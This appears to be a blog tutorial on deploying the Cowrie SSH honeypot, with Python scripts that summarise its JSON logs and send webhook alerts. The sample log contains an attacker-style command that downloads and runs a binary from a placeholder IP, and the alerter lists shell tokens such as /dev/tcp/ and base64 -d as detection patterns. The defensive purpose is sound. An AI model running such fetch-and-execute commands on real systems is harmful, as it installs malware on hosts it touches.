How to Deploy a Honeypot on Your Linux Server to Observe Attackers in Real Time

sudo talon

Fri, 01 Aug 2025

What if you could do more than just block attackers, and watch them instead? Honeypots let you do exactly that. By running a decoy system that looks vulnerable, you can record malicious behaviour, study attack methods and gather intelligence about who is scanning you, while your real services stay out of the attacker's reach, provided the honeypot is kept isolated from them.

In this guide, we’ll walk you through setting up a simple yet effective honeypot using Cowrie, an SSH/Telnet honeypot, on Ubuntu or Red Hat. No complex intrusion detection system (IDS) needed.


1. What Is a Honeypot?

  • A decoy system designed to attract and engage attackers

  • Lets you monitor attack vectors, tools, and behavior in real time

  • Useful for research, logging, and triggering alerts


2. Select Your Honeypot Tool

We’ll use Cowrie — a popular open-source honeypot that emulates SSH and Telnet environments, logging all interactions for analysis.


3. Install Prerequisites

On Ubuntu:

sudo apt update
sudo apt install git python3-venv python3-pip libssl-dev libffi-dev build-essential

On Red Hat:

sudo yum groupinstall "Development Tools"
sudo yum install python3-pip python3-devel libffi-devel openssl-devel git

4. Clone and Configure Cowrie

Cowrie refuses to start as root, so run everything from here on as a dedicated unprivileged user (the project documentation uses one named cowrie) with its own home directory:

git clone https://github.com/cowrie/cowrie.git
cd cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
cp etc/cowrie.cfg.dist etc/cowrie.cfg

Copying the whole cowrie.cfg.dist works, but Cowrie reads both files at startup with cowrie.cfg taking precedence, and only the .dist file is replaced on upgrade. Keeping just your own overrides in etc/cowrie.cfg (hostname, listen ports, output plugins) means an upgrade never silently reverts your settings.

5. Start Cowrie

bin/cowrie start

By default, Cowrie listens on port 2222 and presents an SSH server (its Telnet emulation, on port 2223, is disabled in the default configuration). Every connection is written to var/log/cowrie/cowrie.log and, one JSON event per line, to var/log/cowrie/cowrie.json. Check that it is running with bin/cowrie status.

Automated scanners target port 22, not 2222, so a honeypot left on 2222 sees little traffic. Move your real sshd to another port first, then either add an iptables NAT PREROUTING rule that redirects incoming TCP port 22 to 2222, or let the unprivileged cowrie user bind port 22 directly with authbind. Confirm that your new administrative port works before you redirect 22, or you will lock yourself out.


6. What You'll Discover

Cowrie logs a wealth of attacker data, including:

  • Source IP addresses and ports, plus the SSH client version string and key-exchange fingerprint (HASSH) each client presents

  • Every login attempt with the username and password tried, so brute-force lists and credential-stuffing campaigns are visible in full

  • Every command typed into the emulated shell, session by session

  • Files the attacker fetches with wget or curl inside that shell, which Cowrie downloads and stores under var/lib/cowrie/downloads named by their SHA-256 hash
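The data above is only useful once it is grouped back into sessions. The script below is an added example (not part of Cowrie or of this post) that reads cowrie.json and prints, per session, which source IP connected, which credentials it tried, whether it got in, what it typed, and what it downloaded, plus the busiest sources and most-tried credential pairs. The event ids and field names (cowrie.session.connect, cowrie.login.failed, src_ip, input, shasum, ...) are the ones Cowrie writes; the sample log lines are constructed, the hash is a placeholder, and a deliberately truncated line shows why the parser must skip malformed input rather than abort.

```python
"""Summarise Cowrie's JSON log per attacker session.

Added example, not part of Cowrie. Event ids and field names are the ones
Cowrie writes to var/log/cowrie/cowrie.json; the sample lines are constructed.
"""
import json
import sys
from collections import Counter, defaultdict

# Constructed sample: three sessions from two source IPs. Real entries carry
# extra fields (sensor, dst_ip, message, ...) that this report ignores.
SAMPLE_LOG = "\n".join([
    '{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","src_port":51234,"dst_port":2222,"protocol":"ssh","session":"a1b2c3d4e5f6","timestamp":"2025-08-01T10:00:00.000000Z"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2025-08-01T10:00:01.000000Z"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"password","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2025-08-01T10:00:02.000000Z"}',
    '{"eventid":"cowrie.login.success","username":"root","password":"admin","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2025-08-01T10:00:03.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2025-08-01T10:00:04.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://203.0.113.9/x86 -O .x; chmod +x .x; ./.x","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2025-08-01T10:00:05.000000Z"}',
    '{"eventid":"cowrie.session.file_download","url":"http://203.0.113.9/x86","shasum":"0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef","destfile":".x","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2025-08-01T10:00:06.000000Z"}',
    '{"eventid":"cowrie.session.closed","duration":7.4,"src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2025-08-01T10:00:07.000000Z"}',
    '{"eventid":"cowrie.session.connect","src_ip":"203.0.113.77","src_port":40001,"dst_port":2222,"protocol":"ssh","session":"0f0f0f0f0f0f","timestamp":"2025-08-01T10:05:00.000000Z"}',
    '{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"203.0.113.77","session":"0f0f0f0f0f0f","timestamp":"2025-08-01T10:05:01.000000Z"}',
    '{"eventid":"cowrie.session.closed","duration":1.2,"src_ip":"203.0.113.77","session":"0f0f0f0f0f0f","timestamp":"2025-08-01T10:05:02.000000Z"}',
    '{"eventid":"cowrie.session.connect","src_ip":"203.0.113.77","src_port":40002,"dst_port":2222,"protocol":"ssh","session":"1e1e1e1e1e1e","timestamp":"2025-08-01T10:05:10.000000Z"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.77","session":"1e1e1e1e1e1e","timestamp":"2025-08-01T10:05:11.000000Z"}',
    '{"eventid":"cowrie.session.cl',  # truncated line (process killed mid-write): must be skipped
    '{"eventid":"cowrie.session.closed","duration":1.0,"src_ip":"203.0.113.77","session":"1e1e1e1e1e1e","timestamp":"2025-08-01T10:05:12.000000Z"}',
])


def parse_events(text):
    """Return one dict per well-formed JSON line; Cowrie writes one event per line."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a damaged line must not abort the whole report
    return events


def summarize(events):
    """Group events by Cowrie session id and count what attackers tried."""
    sessions = defaultdict(lambda: {"src_ip": None, "logins": [], "success": None,
                                    "commands": [], "downloads": [], "duration": None})
    sources = Counter()
    credentials = Counter()
    for ev in events:
        s = sessions[ev.get("session")]
        eid = ev.get("eventid", "")
        if eid == "cowrie.session.connect":
            s["src_ip"] = ev["src_ip"]
            sources[ev["src_ip"]] += 1
        elif eid in ("cowrie.login.failed", "cowrie.login.success"):
            pair = (ev["username"], ev["password"])
            credentials[pair] += 1
            s["logins"].append(pair)
            if eid == "cowrie.login.success":
                s["success"] = pair
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((ev.get("url"), ev.get("shasum")))
        elif eid == "cowrie.session.closed":
            s["duration"] = ev.get("duration")
    return {"sessions": dict(sessions),
            "top_sources": sources.most_common(),
            "top_credentials": credentials.most_common()}


def render(report):
    """Plain-text report: busiest sources, most-tried credentials, then each session."""
    out = ["Sessions per source IP:"]
    out += [f"  {ip:<16} {n}" for ip, n in report["top_sources"]]
    out.append("Credentials tried:")
    out += [f"  {u}/{p:<12} {n}" for (u, p), n in report["top_credentials"]]
    for sid, s in report["sessions"].items():
        status = "LOGGED IN as %s/%s" % s["success"] if s["success"] else "no login"
        out.append(f"Session {sid} from {s['src_ip']} ({status}, {s['duration']}s)")
        out += [f"  $ {c}" for c in s["commands"]]
        out += [f"  downloaded {u} sha256={h}" for u, h in s["downloads"]]
    return "\n".join(out)


if __name__ == "__main__":
    # Usage: python3 cowrie_report.py var/log/cowrie/cowrie.json (defaults to the sample)
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_LOG
    print(render(summarize(parse_events(text))))
```

Run it against a real cowrie.json and the "Credentials tried" table is usually the first surprise: the same few username/password pairs dominate across hundreds of sources, which tells you exactly which defaults to forbid on your real hosts.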


7. Pro Tips for Better Insights

  • Set up log alerts: Use email or Discord webhooks for real-time notifications on the events that matter (a successful login, a file download), and rate-limit them so one brute-force run does not become thousands of messages

  • Use Fail2Ban: Protect your actual SSH port while monitoring the honeypot, but never point Fail2Ban at the honeypot's own logs, or it will ban the very attackers you are trying to observe

  • Isolate the honeypot: Run it on a separate VM or container, never on production systems. Cowrie emulates a shell rather than executing attacker commands, but it does fetch the URLs attackers pass to wget and curl, so the host should have no route into your internal network and its logs should be shipped off-box
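The first tip in practice, as an added example that is neither Cowrie's code nor the author's: a small watcher that follows cowrie.json like tail -f, fires a Discord webhook only on a successful login, a file download, or a typed command that looks like payload staging, and suppresses repeats from the same source for five minutes so a brute-force loop cannot flood the channel. Discord incoming webhooks accept a JSON POST with a "content" field and answer 204; the COWRIE_WEBHOOK_URL environment variable, the log path, the suspicious-command token list and the five-minute window are assumptions to adapt. The follower also reopens the file when its inode changes, because Cowrie rotates cowrie.json daily.

```python
"""Real-time alerts from Cowrie's JSON log to a Discord-style webhook.

Added example, not part of Cowrie. Discord incoming webhooks accept a JSON POST
with a "content" field; the env vars, paths and rules below are assumptions.
"""
import json
import os
import sys
import time
import urllib.request

LOG_PATH = os.environ.get("COWRIE_JSON", "var/log/cowrie/cowrie.json")
WEBHOOK_URL = os.environ.get("COWRIE_WEBHOOK_URL", "")  # your Discord webhook URL
SUPPRESS_SECONDS = 300  # at most one alert per (src_ip, eventid) in this window
# Substrings in a typed command that usually mean payload staging (assumed list).
SUSPICIOUS_COMMAND_TOKENS = ("wget ", "curl ", "chmod +x", "/dev/tcp/", "base64 -d")


def build_alert(event):
    """Return a webhook payload for events worth waking someone up for, else None."""
    eid = event.get("eventid", "")
    ip = event.get("src_ip", "?")
    sid = event.get("session", "?")
    if eid == "cowrie.login.success":
        detail = f"login SUCCEEDED as {event.get('username')}/{event.get('password')}"
    elif eid == "cowrie.session.file_download":
        detail = f"downloaded {event.get('url')} (sha256 {event.get('shasum')})"
    elif eid == "cowrie.command.input":
        cmd = event.get("input", "")
        if not any(tok in cmd for tok in SUSPICIOUS_COMMAND_TOKENS):
            return None
        detail = f"ran: {cmd}"
    else:
        return None  # failed logins and connects are far too noisy for a webhook
    return {"content": f"[cowrie] {event.get('timestamp', '')} {ip} session {sid}: {detail}"}


class Throttle:
    """Suppress repeats of the same key within `window` seconds."""

    def __init__(self, window):
        self.window = window
        self.last_sent = {}

    def allow(self, key, now):
        last = self.last_sent.get(key)
        if last is not None and now - last < self.window:
            return False
        self.last_sent[key] = now
        return True


def post_webhook(payload, url=WEBHOOK_URL, timeout=10):
    """POST the payload as JSON; returns the HTTP status (Discord answers 204)."""
    req = urllib.request.Request(
        url, data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json", "User-Agent": "cowrie-alerts/1.0"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


def follow(path, poll=1.0):
    """Yield lines appended to path, reopening it after log rotation."""
    f = open(path, encoding="utf-8")
    f.seek(0, os.SEEK_END)  # only report what happens from now on
    inode = os.fstat(f.fileno()).st_ino
    while True:
        line = f.readline()
        if line:
            yield line
            continue
        try:
            if os.stat(path).st_ino != inode:  # rotated: a new file now has this name
                f.close()
                f = open(path, encoding="utf-8")
                inode = os.fstat(f.fileno()).st_ino
                continue
        except FileNotFoundError:
            pass  # rotation in progress; retry on the next poll
        time.sleep(poll)


def main():
    if not WEBHOOK_URL:
        sys.exit("set COWRIE_WEBHOOK_URL first")
    throttle = Throttle(SUPPRESS_SECONDS)
    for line in follow(LOG_PATH):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # partial line from a write still in progress
        payload = build_alert(event)
        if payload is None:
            continue
        if not throttle.allow((event.get("src_ip"), event.get("eventid")), time.time()):
            continue
        try:
            post_webhook(payload)
        except Exception as exc:  # a webhook outage must not kill the watcher
            print(f"webhook failed: {exc}", file=sys.stderr)


if __name__ == "__main__":
    main()
```

Run it under the same unprivileged cowrie user as a systemd service so it survives reboots. Keep the alert rules narrow: the point of a honeypot is the log, and the webhook is only for the handful of events you want to react to within minutes.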


Conclusion

While a honeypot isn’t a replacement for firewalls or monitoring tools, it gives you something they can’t: insight into the mindset of your attackers. It’s not just about defense — it’s about learning from the threats you face.
